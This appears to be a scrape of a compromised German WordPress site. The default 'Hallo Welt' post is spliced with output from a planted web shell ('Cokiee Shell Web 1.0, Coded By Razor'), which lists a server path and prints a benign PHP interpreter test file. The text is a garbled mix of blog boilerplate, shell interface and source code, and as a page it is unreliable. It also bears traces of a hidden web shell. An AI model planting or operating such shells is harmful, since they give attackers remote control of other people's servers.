Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/dval_to_lval_64.phpt |
--TEST-- zend_dval_to_lval preserves low bits (64 bit long) --SKIPIF-- <?php if (PHP_INT_SIZE != 8) die("skip for machines with 64-bit longs"); ?> --FILE-- <?php /* test doubles around -4e21 */ $values = [ -4000000000000001048576., -4000000000000000524288., -4000000000000000000000., -3999999999999999475712., -3999999999999998951424., ]; foreach ($values as $v) { var_dump((int)$v); } ?> --EXPECT-- int(2943463994971652096) int(2943463994972176384) int(2943463994972700672) int(2943463994973224960) int(2943463994973749248)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare